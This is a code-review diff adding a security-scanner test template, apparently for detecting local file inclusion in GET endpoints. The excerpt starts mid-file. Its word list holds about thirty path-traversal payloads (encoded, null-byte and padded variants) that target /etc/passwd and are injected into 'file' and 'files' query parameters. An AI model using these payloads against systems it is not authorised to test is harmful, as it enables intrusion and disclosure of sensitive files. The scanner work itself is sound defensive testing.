apps/dashboard/src/main/resources/inbuilt_test_yaml_files/LFIAddingNewParam.yaml

```diff
@@ -0,0 +1,99 @@
+  impact: "Successful exploitation might compromise sensitive data such as passwords, source-code, confidential files etc."
+  category:
+    name: FI
+    shortName: File Inclusion
+    displayName: File Inclusion (FI)
+  subCategory: FILE_INCLUSION_NEW_PARAM
+  severity: HIGH
+  tags:
+    - Business logic
+    - OWASP top 10
+    - HackerOne top 10
+  references:
+    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion"
+    - "https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt"
+api_selection_filters:
+  response_code:
+    gte: 200
+    lt: 300
+
+  method:
+    contains_either:
+      - "GET"
+
+wordLists:
+  filePaths: 
+    - /etc/passwd
+    - /etc/npasswd
+    - ..//etc/passwd
+    - ../..//etc/passwd
+    - ../../..//etc/passwd
+    - ../../../..//etc/passwd
+    - ../../../../..//etc/passwd
+    - ../../../../../..//etc/passwd
+    - ..%2f/etc/passwd
+    - ..%2f..%2f/etc/passwd
+    - ..%2f..%2f..%2f/etc/passwd
+    - ..%2f..%2f..%2f..%2f/etc/passwd
+    - ..%2f..%2f..%2f..%2f..%2f/etc/passwd
+    - ..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
+    - ..\/etc/passwd
+    - ..\..\/etc/passwd
+    - ..\..\..\/etc/passwd
+    - ..\..\..\..\/etc/passwd
+    - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/..//etc/passwd
+    - 0x2e0x2e//etc/passwd
+    - 0x2e0x2e/0x2e0x2e//etc/passwd
+    - ..0x2f/etc/passwd
+    - ..0x2f..0x2f/etc/passwd
+    - ..0x2f..0x2f..0x2f/etc/passwd
+    - ..///etc/passwd
+    - ..//..///etc/passwd
+    - ..//..//..///etc/passwd
+    - .\\..\\/etc/passwd
+    - .\\..\\.\\..\\/etc/passwd
+    - ../../../../../../../../../../../../etc/passwd%00
+
+execute:
+  type: single
+  requests:
+    - req:
+      - add_query_param:
+          file: ${filePaths}
+      - add_query_param:
+          files: ${filePaths}
```

Comment:
FYI: these will be separate attempts, since filepath is a list, file, files queryparams will be added separately

Reply:
that's ok